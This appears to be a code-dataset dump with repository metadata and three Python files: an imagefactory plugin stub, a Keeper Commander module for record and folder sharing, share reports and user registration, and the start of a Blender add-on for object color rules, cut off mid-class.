hexsha stringlengths 40 40 | size int64 4 1.02M | ext stringclasses 8 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 209 | max_stars_repo_name stringlengths 5 121 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 209 | max_issues_repo_name stringlengths 5 121 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 209 | max_forks_repo_name stringlengths 5 121 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 1.02M | avg_line_length float64 1.07 66.1k | max_line_length int64 4 266k | alphanum_fraction float64 0.01 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0f1c2d482a9d464ee63f7a050253a80eb52a5d47 | 659 | py | Python | imagefactory_plugins/Atlas/__init__.py | zyga/imagefactory | b2a57168f1ef6608aedad73ed7ccd1e3626b2967 | [
"Apache-2.0"
] | 1 | 2019-06-16T07:05:24.000Z | 2019-06-16T07:05:24.000Z | imagefactory_plugins/Atlas/__init__.py | zyga/imagefactory | b2a57168f1ef6608aedad73ed7ccd1e3626b2967 | [
"Apache-2.0"
] | null | null | null | imagefactory_plugins/Atlas/__init__.py | zyga/imagefactory | b2a57168f1ef6608aedad73ed7ccd1e3626b2967 | [
"Apache-2.0"
] | null | null | null | # encoding: utf-8
# Copyright 2016 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from Atlas import Atlas as delegate_class
| 36.611111 | 76 | 0.737481 |
6c8143bcec986a0fd2ec04d249c3ab0573a6c5a7 | 44,514 | py | Python | keepercommander/commands/register.py | esa-security-deverlopment/Commander | 1cdba2e7ee3be17cba5ee5e6dc507e462dd6add5 | [
"MIT"
] | null | null | null | keepercommander/commands/register.py | esa-security-deverlopment/Commander | 1cdba2e7ee3be17cba5ee5e6dc507e462dd6add5 | [
"MIT"
] | null | null | null | keepercommander/commands/register.py | esa-security-deverlopment/Commander | 1cdba2e7ee3be17cba5ee5e6dc507e462dd6add5 | [
"MIT"
] | null | null | null | # _ __
# | |/ /___ ___ _ __ ___ _ _ ®
# | ' </ -_) -_) '_ \/ -_) '_|
# |_|\_\___\___| .__/\___|_|
# |_|
#
# Keeper Commander
# Copyright 2018 Keeper Security Inc.
# Contact: ops@keepersecurity.com
#
import argparse
import getpass
import re
import os
import base64
import json
import logging
from urllib.parse import urlsplit, urlunsplit
from email.utils import parseaddr
from tabulate import tabulate
from Cryptodome.PublicKey import RSA
from Cryptodome.Util.asn1 import DerSequence
from Cryptodome.Math.Numbers import Integer
from .. import api, generator
from .record import RecordAddCommand
from ..params import KeeperParams
from ..subfolder import BaseFolderNode, try_resolve_path
from .enterprise import EnterpriseCommand, EnterprisePushCommand
from .base import raise_parse_exception, suppress_exit, Command
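# Case-insensitive pattern used below to tell e-mail addresses apart from team names in user arguments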
EMAIL_PATTERN=r"(?i)^[A-Z0-9._%+-]+@(?:[A-Z0-9-]+\.)+[A-Z]{2,}$"
def register_commands(commands):
commands['share-record'] = ShareRecordCommand()
commands['share-folder'] = ShareFolderCommand()
commands['share-report'] = ShareReportCommand()
commands['create-user'] = RegisterCommand()
def register_command_info(aliases, command_info):
aliases['sr'] = 'share-record'
aliases['sf'] = 'share-folder'
aliases['cu'] = 'create-user'
for p in [share_record_parser, share_folder_parser, share_report_parser, register_parser]:
command_info[p.prog] = p.description
share_record_parser = argparse.ArgumentParser(prog='share-record|sr', description='Change record share permissions')
share_record_parser.add_argument('-e', '--email', dest='email', action='append', required=True, help='account email')
share_record_parser.add_argument('-a', '--action', dest='action', choices=['grant', 'revoke', 'owner'], default='grant', action='store', help='user share action. \'grant\' if omitted')
share_record_parser.add_argument('-s', '--share', dest='can_share', action='store_true', help='can re-share record')
share_record_parser.add_argument('-w', '--write', dest='can_edit', action='store_true', help='can modify record')
share_record_parser.add_argument('record', nargs='?', type=str, action='store', help='record path or UID')
share_record_parser.error = raise_parse_exception
share_record_parser.exit = suppress_exit
share_folder_parser = argparse.ArgumentParser(prog='share-folder|sf', description='Change shared folder permissions')
share_folder_parser.add_argument('-a', '--action', dest='action', choices=['grant', 'revoke'], default='grant', action='store', help='shared folder action. \'grant\' if omitted')
share_folder_parser.add_argument('-u', '--user', dest='user', action='append', help='account email, team, or \'*\' as default folder permission')
share_folder_parser.add_argument('-r', '--record', dest='record', action='append', help='record name, record UID, or \'*\' as default folder permission')
share_folder_parser.add_argument('-p', '--manage-records', dest='manage_records', action='store_true', help='account permission: can manage records.')
share_folder_parser.add_argument('-o', '--manage-users', dest='manage_users', action='store_true', help='account permission: can manage users.')
share_folder_parser.add_argument('-s', '--can-share', dest='can_share', action='store_true', help='record permission: can be shared')
share_folder_parser.add_argument('-e', '--can-edit', dest='can_edit', action='store_true', help='record permission: can be modified.')
share_folder_parser.add_argument('folder', nargs='?', type=str, action='store', help='shared folder path or UID')
share_folder_parser.error = raise_parse_exception
share_folder_parser.exit = suppress_exit
share_report_parser = argparse.ArgumentParser(prog='share-report', description='Display report on record sharing')
share_report_parser.add_argument('-r', '--record', dest='record', action='append', help='record name or UID')
share_report_parser.add_argument('-u', '--user', dest='user', action='append', help='user email or team name')
#share_report_parser.add_argument('-s', '--can-share', dest='can_share', action='store_true', help='record permission: can be shared')
#share_report_parser.add_argument('-e', '--can-edit', dest='can_edit', action='store_true', help='record permission: can be modified.')
share_report_parser.error = raise_parse_exception
share_report_parser.exit = suppress_exit
register_parser = argparse.ArgumentParser(prog='create-user', description='Create Keeper User')
register_parser.add_argument('--store-record', dest='store', action='store_true', help='store credentials into Keeper record (must be logged in)')
register_parser.add_argument('--generate', dest='generate', action='store_true', help='generate password')
register_parser.add_argument('--pass', dest='password', action='store', help='user password')
register_parser.add_argument('--data-center', dest='data_center', choices=['us', 'eu'], action='store', help='data center.')
register_parser.add_argument('--node', dest='node', action='store', help='node name or node ID (enterprise only)')
register_parser.add_argument('--name', dest='name', action='store', help='user name (enterprise only)')
register_parser.add_argument('--expire', dest='expire', action='store_true', help='expire master password (enterprise only)')
register_parser.add_argument('--records', dest='records', action='store', help='populate vault with default records (enterprise only)')
register_parser.add_argument('--question', dest='question', action='store', help='security question')
register_parser.add_argument('--answer', dest='answer', action='store', help='security answer')
register_parser.add_argument('email', action='store', help='email')
register_parser.error = raise_parse_exception
register_parser.exit = suppress_exit
class RegisterCommand(Command):
def is_authorised(self):
return False
def get_parser(self):
return register_parser
@staticmethod
def get_iterations():
return 100000
def execute(self, params, **kwargs):
email = kwargs['email'] if 'email' in kwargs else None
if email:
_, email = parseaddr(email)
if not email:
logging.error('A valid email address is expected.')
return
rq = {
'command': 'pre_register',
'email': email
}
rs = api.run_command(params, rq)
if rs['result_code'] != 'Failed_to_find_user':
if rs['result'] == 'success':
logging.warning('User \'%s\' already exists in Keeper', email)
else:
logging.error(rs['message'])
return
password_rules = rs['password_rules']
# check enterprise
verification_code = None
if params.enterprise:
node_id = None
if kwargs.get('node'):
for node in params.enterprise['nodes']:
if kwargs['node'] in {str(node['node_id']), node['data'].get('displayname')}:
node_id = node['node_id']
break
elif not node.get('parent_id') and kwargs['node'] == params.enterprise['enterprise_name']:
node_id = node['node_id']
break
if node_id is None:
for node in params.enterprise['nodes']:
if not node.get('parent_id'):
node_id = node['node_id']
break
data = {}
name = kwargs.get('name')
if name:
data['displayname'] = name
else:
logging.error('\'name\' parameter is required for enterprise users')
return
rq = {
'command': 'enterprise_user_add',
'enterprise_user_id': EnterpriseCommand.get_enterprise_id(params),
'enterprise_user_username': email,
'encrypted_data': api.encrypt_aes(json.dumps(data).encode('utf-8'), params.enterprise['unencrypted_tree_key']),
'node_id': node_id,
'suppress_email_invite': True
}
try:
rs = api.communicate(params, rq)
if rs['result'] == 'success':
verification_code = rs.get('verification_code')
# re-read password rules
rq = {
'command': 'pre_register',
'email': email
}
rs = api.run_command(params, rq)
if 'password_rules' in rs:
password_rules = rs['password_rules']
except:
pass
password = kwargs['password'] if 'password' in kwargs else None
generate = kwargs['generate'] if 'generate' in kwargs else None
if generate:
password = generator.generate(16)
else:
while not password:
pwd = getpass.getpass(prompt='Password: ', stream=None)
failed_rules = []
for r in password_rules:
m = re.match(r['pattern'], pwd)
if r['match']:
if m is None:
failed_rules.append(r['description'])
else:
if m is not None:
failed_rules.append(r['description'])
if len(failed_rules) == 0:
password = pwd
else:
logging.error(rs['password_rules_intro'])
for fr in failed_rules:
logging.error(fr)
new_params = KeeperParams()
new_params.server = params.server
data_center = kwargs.get('data_center')
if data_center:
parts = list(urlsplit(new_params.server))
host = parts[1]
port = ''
colon_pos = host.rfind(':')
if colon_pos > 0:
port = host[colon_pos:]
host = host[:colon_pos]
suffix = '.eu' if data_center == 'eu' else '.com'
if not host.endswith(suffix):
dot_pos = host.rfind('.')
if dot_pos > 0:
host = host[:dot_pos] + suffix
parts[1] = host+port
new_params.server = urlunsplit(parts)
data_key = os.urandom(32)
iterations = self.get_iterations()
auth_salt = os.urandom(16)
enc_salt = os.urandom(16)
backup_salt = os.urandom(16)
rsa_key = RSA.generate(2048)
private_key = DerSequence([0,
rsa_key.n,
rsa_key.e,
rsa_key.d,
rsa_key.p,
rsa_key.q,
rsa_key.d % (rsa_key.p-1),
rsa_key.d % (rsa_key.q-1),
Integer(rsa_key.q).inverse(rsa_key.p)
]).encode()
pub_key = rsa_key.publickey()
public_key = DerSequence([pub_key.n,
pub_key.e
]).encode()
rq = {
'command': 'register',
'version': 1,
'email': email,
'auth_verifier': api.create_auth_verifier(password, auth_salt, iterations),
'encryption_params': api.create_encryption_params(password, enc_salt, iterations, data_key),
'encrypted_private_key': api.encrypt_aes(private_key, data_key),
'public_key': base64.urlsafe_b64encode(public_key).decode().rstrip('='),
'client_key': api.encrypt_aes(os.urandom(32), data_key)
}
if verification_code:
rq['verification_code'] = verification_code
rs = api.run_command(new_params, rq)
if rs['result'] == 'success':
logging.info("Created account: %s ", email)
if kwargs.get('question'):
if not kwargs.get('answer'):
print('...' + 'Security Question: '.rjust(24) + kwargs['question'])
kwargs['answer'] = input('...' + 'Security Answer: '.rjust(24))
if kwargs.get('answer'):
try:
param1 = KeeperParams()
param1.server = new_params.server
param1.user = email
param1.password = password
param1.rest_context.device_id = params.rest_context.device_id
api.login(param1)
answer = kwargs['answer'].lower().replace(' ', '')
rq = {
'command': 'set_data_key_backup',
'version': 2,
'data_key_backup': api.create_encryption_params(answer, backup_salt, iterations, data_key),
'security_question': kwargs['question'],
'security_answer_salt': base64.urlsafe_b64encode(backup_salt).decode().rstrip('='),
'security_answer_iterations': iterations,
'security_answer_hash': base64.urlsafe_b64encode(api.derive_key(answer, backup_salt, iterations)).decode().rstrip('=')
}
api.communicate(param1, rq)
logging.info('Master password backup is created.')
except Exception as e:
logging.error('Failed to create master password backup. %s', e)
if params.enterprise:
api.query_enterprise(params)
file_name = kwargs.get('records')
should_accept_share = False
if file_name:
try:
push = EnterprisePushCommand()
push.execute(params, user=[email], file=file_name)
should_accept_share = True
except Exception as e:
                        logging.info('Error pushing records: %s', e)
# first accept shares from enterprise admin
if should_accept_share:
try:
param1 = KeeperParams()
param1.server = new_params.server
param1.user = email
param1.password = password
param1.rest_context.device_id = params.rest_context.device_id
api.login(param1)
rq = {
'command': 'accept_share',
'from_email': params.user
}
api.communicate(param1, rq)
except Exception as e:
logging.info('Error accepting shares: %s', e)
# last expire password
if kwargs.get('expire'):
try:
rq = {
'command': 'set_master_password_expire',
'email': email
}
api.communicate(params, rq)
except Exception as e:
logging.info('Error expiring master password: %s', e)
store = kwargs['store'] if 'store' in kwargs else None
if store:
if params.session_token:
try:
add_command = RecordAddCommand()
add_command.execute(params, title='Keeper credentials for {0}'.format(email), login=email, password=password, force=True)
except Exception:
store = False
logging.error('Failed to create record in Keeper')
else:
store = False
if generate and not store:
logging.warning('Generated password: %s', password)
if params.enterprise:
api.query_enterprise(params)
else:
logging.error(rs['message'])
class ShareFolderCommand(Command):
def get_parser(self):
return share_folder_parser
def execute(self, params, **kwargs):
folder = None
name = kwargs.get('folder')
if name:
if name in params.folder_cache:
folder = params.folder_cache[name]
else:
rs = try_resolve_path(params, name)
if rs is not None:
folder, name = rs
if len(name or '') > 0:
folder = None
elif folder.type == BaseFolderNode.RootFolderType:
folder = None
if folder is None:
logging.error('Enter name of the existing folder')
return
if folder.type not in {BaseFolderNode.SharedFolderType, BaseFolderNode.SharedFolderFolderType}:
logging.error('You can change permission of shared folders only')
return
shared_folder_uid = folder.shared_folder_uid if folder.type == BaseFolderNode.SharedFolderFolderType else folder.uid
if shared_folder_uid in params.shared_folder_cache:
sh_fol = params.shared_folder_cache[shared_folder_uid]
#TODO check permission to modify shared folder
action = kwargs.get('action') or 'grant'
public_keys = {}
team_keys = {}
default_account = False
if 'user' in kwargs:
emails = []
teams = []
for u in (kwargs.get('user') or []):
if u == '*':
default_account = True
else:
em = re.match(EMAIL_PATTERN, u)
if not em is None:
emails.append(u)
else:
team_uid = None
for tid in params.team_cache:
if tid == u or params.team_cache[tid]['name'].lower() == u.lower():
team_uid = params.team_cache[tid]['team_uid']
break
if team_uid:
teams.append(team_uid)
else:
logging.warning('User %s could not be resolved as email or team', u)
if len(emails) > 0:
rq = {
'command': 'public_keys',
'key_owners': emails
}
rs = api.communicate(params, rq)
if 'public_keys' in rs:
for pk in rs['public_keys']:
if 'public_key' in pk:
email = pk['key_owner'].lower()
if email != params.user.lower():
public_keys[email] = pk['public_key']
else:
logging.warning('\'%s\' is not a known Keeper account', pk['key_owner'])
if len(teams) > 0:
rq = {
'command': 'team_get_keys',
'teams': teams
}
rs = api.communicate(params, rq)
if 'keys' in rs:
for tk in rs['keys']:
if 'key' in tk:
team_uid = tk['team_uid']
if tk['type'] == 1:
team_keys[team_uid] = api.decrypt_data(tk['key'], params.data_key)
elif tk['type'] == 2:
team_keys[team_uid] = api.decrypt_rsa(tk['key'], params.rsa_key)
elif tk['type'] == 3:
team_keys[team_uid] = base64.urlsafe_b64decode(tk['key'] + '==')
record_uids = []
default_record = False
if 'record' in kwargs:
records = kwargs.get('record') or []
for r in records:
if r == '*':
default_record = True
elif r in params.record_cache:
record_uids.append(r)
else:
r_uid = None
rs = try_resolve_path(params, r)
if rs is not None:
sf, name = rs
if name:
shared_folder_uid = sf.uid or ''
if shared_folder_uid in params.subfolder_record_cache:
for uid in params.subfolder_record_cache[shared_folder_uid]:
rec = api.get_record(params, uid)
if name in {rec.title, rec.record_uid}:
r_uid = rec.record_uid
break
if r_uid:
record_uids.append(r_uid)
else:
logging.error('\'%s\' is not an existing record title or UID', r)
request = {
'command': 'shared_folder_update',
'pt': 'Commander',
'operation': 'update',
'shared_folder_uid': sh_fol['shared_folder_uid'],
'revision': sh_fol['revision']
}
if default_account:
if kwargs.get('manage_records'):
request['default_manage_records'] = action == 'grant'
if kwargs.get('manage_users'):
request['default_manage_users'] = action == 'grant'
if default_record:
if kwargs.get('can_edit'):
request['default_can_edit'] = action == 'grant'
if kwargs.get('can_share'):
request['default_can_share'] = action == 'grant'
if len(public_keys) > 0:
email_set = set()
if 'users' in sh_fol:
for user in sh_fol['users']:
email_set.add(user['username'])
mr = kwargs.get('manage_records')
mu = kwargs.get('manage_users')
for email in public_keys:
uo = {
'username': email
}
share_action = ''
if email in email_set:
if action == 'grant':
if mr:
uo['manage_records'] = True
if mu:
uo['manage_users'] = True
share_action = 'update_users'
else:
if mr or mu:
if mr:
uo['manage_records'] = False
if mu:
uo['manage_users'] = False
share_action = 'update_users'
else:
share_action = 'remove_users'
elif action == 'grant':
uo['manage_records'] = mr
uo['manage_users'] = mu
rsa_key = RSA.importKey(base64.urlsafe_b64decode(public_keys[email] + '=='))
uo['shared_folder_key'] = api.encrypt_rsa(sh_fol['shared_folder_key_unencrypted'], rsa_key)
share_action = 'add_users'
if share_action:
if not share_action in request:
request[share_action] = []
request[share_action].append(uo)
if len(team_keys) > 0:
team_set = set()
if 'teams' in sh_fol:
for team in sh_fol['teams']:
team_set.add(team['team_uid'])
mr = kwargs.get('manage_records')
mu = kwargs.get('manage_users')
for team_uid in team_keys:
to = {
'team_uid': team_uid
}
share_action = ''
if team_uid in team_set:
if action == 'grant':
if mr:
to['manage_records'] = True
if mu:
to['manage_users'] = True
share_action = 'update_teams'
else:
if mr or mu:
if mr:
to['manage_records'] = False
if mu:
to['manage_users'] = False
share_action = 'update_teams'
else:
share_action = 'remove_teams'
elif action == 'grant':
to['manage_records'] = mr
to['manage_users'] = mu
to['shared_folder_key'] = api.encrypt_aes(sh_fol['shared_folder_key_unencrypted'], team_keys[team_uid])
share_action = 'add_teams'
if share_action:
if not share_action in request:
request[share_action] = []
request[share_action].append(to)
if len(record_uids) > 0:
ruid_set = set()
if 'records' in sh_fol:
for r in sh_fol['records']:
ruid_set.add(r['record_uid'])
team_uid = ''
if not 'key_type' in sh_fol:
if 'teams' in sh_fol:
for team in sh_fol['teams']:
team_uid = team['team_uid']
if team.get('manage_records'):
break
for record_uid in record_uids:
ro = {
'record_uid': record_uid
}
if team_uid:
ro['team_uid'] = team_uid
ro['shared_folder_uid'] = sh_fol['shared_folder_uid']
share_action = ''
ce = kwargs.get('can_edit')
cs = kwargs.get('can_share')
if record_uid in ruid_set:
if action == 'grant':
if ce:
ro['can_edit'] = True
if cs:
ro['can_share'] = True
share_action = 'update_records'
else:
if ce or cs:
if ce:
ro['can_edit'] = False
if cs:
ro['can_share'] = False
share_action = 'update_records'
else:
share_action = 'remove_records'
else:
if action == 'grant':
ro['can_edit'] = ce
ro['can_share'] = cs
rec = params.record_cache[record_uid]
ro['record_key'] = api.encrypt_aes(rec['record_key_unencrypted'], sh_fol['shared_folder_key_unencrypted'])
share_action = 'add_records'
if share_action:
if not share_action in request:
request[share_action] = []
request[share_action].append(ro)
response = api.communicate(params, request)
params.sync_data = True
for node in ['add_teams', 'update_teams', 'remove_teams']:
if node in response:
for t in response[node]:
team = api.get_team(params, t['team_uid'])
if t['status'] == 'success':
logging.warning('Team share \'%s\' %s', team.name, 'added' if node =='add_teams' else 'updated' if node == 'update_teams' else 'removed')
else:
logging.error('Team share \'%s\' failed', team.name)
for node in ['add_users', 'update_users', 'remove_users']:
if node in response:
for s in response[node]:
if s['status'] == 'success':
logging.warning('User share \'%s\' %s', s['username'], 'added' if node =='add_users' else 'updated' if node == 'update_users' else 'removed')
elif s['status'] == 'invited':
logging.warning('User \'%s\' invited', s['username'])
else:
logging.error('User share \'%s\' failed', s['username'])
for node in ['add_records', 'update_records', 'remove_records']:
if node in response:
for r in response[node]:
rec = api.get_record(params, r['record_uid'])
if r['status'] == 'success':
logging.warning('Record share \'%s\' %s', rec.title, 'added' if node =='add_records' else 'updated' if node == 'update_records' else 'removed')
else:
logging.error('Record share \'%s\' failed', rec.title)
class ShareRecordCommand(Command):
def get_parser(self):
return share_record_parser
def execute(self, params, **kwargs):
name = kwargs['record'] if 'record' in kwargs else None
if not name:
self.get_parser().print_help()
return
record_uid = None
if name in params.record_cache:
record_uid = name
else:
rs = try_resolve_path(params, name)
if rs is not None:
folder, name = rs
if folder is not None and name is not None:
folder_uid = folder.uid or ''
if folder_uid in params.subfolder_record_cache:
for uid in params.subfolder_record_cache[folder_uid]:
r = api.get_record(params, uid)
if r.title.lower() == name.lower():
record_uid = uid
break
if record_uid is None:
logging.error('Enter name or uid of existing record')
return
emails = kwargs.get('email') or []
if not emails:
logging.error('\'email\' parameter is missing')
return
public_keys = {}
rq = {
'command': 'public_keys',
'key_owners': emails
}
rs = api.communicate(params, rq)
if 'public_keys' in rs:
for pk in rs['public_keys']:
if 'public_key' in pk:
email = pk['key_owner'].lower()
if email != params.user.lower():
public_keys[email] = pk['public_key']
else:
logging.error('\'%s\' is not a known Keeper account', pk['key_owner'])
if len(public_keys) == 0:
logging.error('No existing Keeper accounts provided.')
return
record_path = api.resolve_record_share_path(params, record_uid)
if record_path is None:
logging.error('You do not have permissions to share this record.')
return
rq = {
'command': 'get_records',
'include': ['shares'],
'records': [record_path]
}
rs = api.communicate(params, rq)
existing_shares = {}
if 'records' in rs:
if 'user_permissions' in rs['records'][0]:
for po in rs['records'][0]['user_permissions']:
existing_shares[po['username'].lower()] = po
can_edit = kwargs.get('can_edit') or False
can_share= kwargs.get('can_share') or False
record_key = params.record_cache[record_uid]['record_key_unencrypted']
rq = {
'command': 'record_share_update',
'pt': 'Commander'
}
action = kwargs.get('action') or 'grant'
if action == 'owner':
if len(public_keys) > 1:
logging.error('You can transfer ownership to a single account only')
return
for email in public_keys:
current = existing_shares.get(email)
ro = {
'to_username': email
}
ro.update(record_path)
share_action = ''
if action == 'grant':
if current is None:
rsa_key = RSA.importKey(base64.urlsafe_b64decode(public_keys[email] + '=='))
ro['record_key'] = api.encrypt_rsa(record_key, rsa_key)
                    ro['editable'] = can_edit
ro['shareable'] = can_share
else:
ro['editable'] = True if can_edit else current['editable']
ro['shareable'] = True if can_share else current['shareable']
share_action = 'add_shares' if current is None else 'update_shares'
elif action == 'revoke':
if not current is None:
if can_share or can_edit:
ro['editable'] = False if can_edit else current['editable']
ro['shareable'] = False if can_share else current['shareable']
share_action = 'update_shares'
else:
share_action = 'remove_shares'
elif action == 'owner':
if record_uid in params.meta_data_cache and params.meta_data_cache[record_uid].get('owner'):
ro['transfer'] = True
if current is None:
rsa_key = RSA.importKey(base64.urlsafe_b64decode(public_keys[email] + '=='))
ro['record_key'] = api.encrypt_rsa(record_key, rsa_key)
share_action = 'add_shares'
else:
share_action = 'update_shares'
else:
logging.error('You should be a record owner to be able to transfer ownership')
return
else:
pass
if share_action:
if share_action not in rq:
rq[share_action] = []
rq[share_action].append(ro)
rs = api.communicate(params, rq)
if 'add_statuses' in rs:
emails = [x['to_username'] for x in rs['add_statuses'] if x['status'] in ['success']]
if emails:
logging.info('Record is successfully shared with: %s', ', '.join(emails))
emails = [x['to_username'] for x in rs['add_statuses'] if x['status'] in ['pending_accept']]
if emails:
logging.info('Recipient must accept request to complete sharing. Invitation sent to %s. ', ', '.join(emails))
emails = [x['to_username'] for x in rs['add_statuses'] if x['status'] not in ['success', 'pending_accept']]
if emails:
logging.info('Failed to share record with: %s', ', '.join(emails))
if 'remove_statuses' in rs:
emails = [x['to_username'] for x in rs['remove_statuses'] if x['status'] == 'success']
if emails:
logging.info('Stopped sharing record with: %s', ', '.join(emails))
class ShareReportCommand(Command):
def get_parser(self):
return share_report_parser
def execute(self, params, **kwargs):
record_uids = []
user_filter = set()
record_filter = set()
if kwargs.get('record'):
records = kwargs.get('record') or []
for r in records:
if r in params.record_cache:
record_filter.add(r)
else:
r_uid = None
rs = try_resolve_path(params, r)
if rs is not None:
sf, name = rs
if name:
shared_folder_uid = sf.uid or ''
if shared_folder_uid in params.subfolder_record_cache:
for uid in params.subfolder_record_cache[shared_folder_uid]:
rec = api.get_record(params, uid)
if name in {rec.title, rec.record_uid}:
r_uid = rec.record_uid
break
if r_uid:
record_filter.add(r_uid)
else:
logging.error('\'%s\' is not an existing record title or UID', r)
return
record_uids = [x for x in record_filter]
elif kwargs.get('user'):
for u in kwargs['user']:
user_filter.add(u)
record_uids = [x['record_uid'] for x in params.record_cache.values() if x['shared']]
else:
record_uids = [x['record_uid'] for x in params.record_cache.values() if x['shared']]
api.get_record_shares(params, record_uids)
record_shares = {}
sf_shares = {}
for uid in record_uids:
record = params.record_cache[uid]
if 'shares' in record:
if 'user_permissions' in record['shares']:
for up in record['shares']['user_permissions']:
user_name = up['username']
if user_filter:
if user_name not in user_filter:
continue
if user_name not in record_shares:
record_shares[user_name] = set()
if uid not in record_shares[user_name]:
record_shares[user_name].add(uid)
if 'shared_folder_permissions' in record['shares']:
names = set()
for sfp in record['shares']['shared_folder_permissions']:
shared_folder_uid = sfp['shared_folder_uid']
if shared_folder_uid in params.shared_folder_cache:
shared_folder = params.shared_folder_cache[sfp['shared_folder_uid']]
names.clear()
if 'users' in shared_folder:
for u in shared_folder['users']:
user_name = u['username']
if user_filter:
if user_name not in user_filter:
continue
names.add(user_name)
if 'teams' in shared_folder:
for t in shared_folder['teams']:
user_name = t['name']
if user_filter:
if user_name not in user_filter:
continue
names.add(user_name)
for user_name in names:
if user_name not in sf_shares:
sf_shares[user_name] = set()
if shared_folder_uid not in sf_shares[user_name]:
sf_shares[user_name].add(shared_folder_uid)
if 'records' in shared_folder:
for sfr in shared_folder['records']:
uid = sfr['record_uid']
if record_filter:
if not uid in record_filter:
continue
for user_name in names:
if user_filter:
if user_name not in user_filter:
continue
if user_name not in record_shares:
record_shares[user_name] = set()
if uid not in record_shares[user_name]:
record_shares[user_name].add(uid)
if kwargs.get('record'):
if len(record_shares) > 0:
users_shares = {}
for user in record_shares:
for uid in record_shares[user]:
if uid not in users_shares:
users_shares[uid] = set()
users_shares[uid].add(user)
for record_uid in users_shares:
record = api.get_record(params, record_uid)
print('')
print('{0:>20s} {1}'.format('Record UID:', record.record_uid))
print('{0:>20s} {1}'.format('Title:', record.title))
for i, user in enumerate(users_shares[record_uid]):
print('{0:>20s} {1}'.format('Shared with:' if i == 0 else '', user))
print('')
elif kwargs.get('user'):
if len(record_shares) > 0:
user_names = [x for x in record_shares.keys()]
user_names.sort()
headers = ['#', 'Record UID', 'Title']
for user in user_names:
record_uids = record_shares[user]
records = [api.get_record(params, x) for x in record_uids]
records.sort(key=lambda x: x.title.lower())
table = [[i+1, r.record_uid, r.title] for i, r in enumerate(records)]
print('')
print('Records shared with: {0}'.format(user))
print('')
print(tabulate(table, headers=headers))
print('')
if len(sf_shares) > 0:
user_names = [x for x in sf_shares.keys()]
user_names.sort(key=lambda x: x.lower())
headers = ['#', 'Shared Folder UID', 'Name']
for user in user_names:
sf_uids = sf_shares[user]
sfs = [api.get_shared_folder(params, x) for x in sf_uids]
sfs.sort(key=lambda x: x.name.lower())
table = [[i+1, sf.shared_folder_uid, sf.name] for i, sf in enumerate(sfs)]
print('')
print('Folders shared with: {0}'.format(user))
print('')
print(tabulate(table, headers=headers))
print('')
else:
if params.user in record_shares:
del record_shares[params.user]
if params.user in sf_shares:
del sf_shares[params.user]
headers = ['#', 'Shared to', 'Records']
table = [(s[0], len(s[1])) for s in record_shares.items()]
table.sort(key=lambda x: x[1], reverse=True)
table = [[i+1, s[0], s[1]] for i, s in enumerate(table)]
print('')
print(tabulate(table, headers=headers))
print('')
| 45.796296 | 184 | 0.481781 |
2851f310618c8917f3028e1bb80b50a4be466a29 | 14,826 | py | Python | engine/2.80/scripts/addons_contrib/object_color_rules.py | byteinc/Phasor | f7d23a489c2b4bcc3c1961ac955926484ff8b8d9 | [
"Unlicense"
] | 2 | 2019-03-20T13:10:46.000Z | 2019-05-15T20:00:31.000Z | engine/2.80/scripts/addons_contrib/object_color_rules.py | byteinc/Phasor | f7d23a489c2b4bcc3c1961ac955926484ff8b8d9 | [
"Unlicense"
] | null | null | null | engine/2.80/scripts/addons_contrib/object_color_rules.py | byteinc/Phasor | f7d23a489c2b4bcc3c1961ac955926484ff8b8d9 | [
"Unlicense"
] | null | null | null | # ***** BEGIN GPL LICENSE BLOCK *****
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ***** END GPL LICENCE BLOCK *****
bl_info = {
"name": "Object Color Rules",
"author": "Campbell Barton",
"version": (0, 0, 1),
"blender": (2, 73, 0),
"location": "Properties > Object Buttons",
"description": "Rules for assigning object color (used for wireframe colors).",
"wiki_url": "http://wiki.blender.org/index.php/Extensions:2.6/Py/"
"Scripts/Object/Color_Rules",
"tracker_url": "https://developer.blender.org/maniphest/task/edit/form/2/",
"category": "Object",
}
def test_name(rule, needle, haystack):
# TODO, compile expression for re-use
if rule.use_match_regex:
import re
return (re.match(needle, haystack) is not None)
else:
return (needle in haystack)
class rule_test:
__slots__ = ()
def __new__(cls, *args, **kwargs):
raise RuntimeError("%s should not be instantiated" % cls)
@staticmethod
def NAME(obj, rule, cache):
match_name = rule.match_name
return test_name(rule, match_name, obj.name)
    @staticmethod
    def DATA(obj, rule, cache):
match_name = rule.match_name
obj_data = obj.data
if obj_data is not None:
return test_name(rule, match_name, obj_data.name)
else:
return False
@staticmethod
def GROUP(obj, rule, cache):
if not cache:
match_name = rule.match_name
objects = {o for g in bpy.data.collections if test_name(rule, match_name, g.name) for o in g.objects}
cache["objects"] = objects
else:
objects = cache["objects"]
return obj in objects
@staticmethod
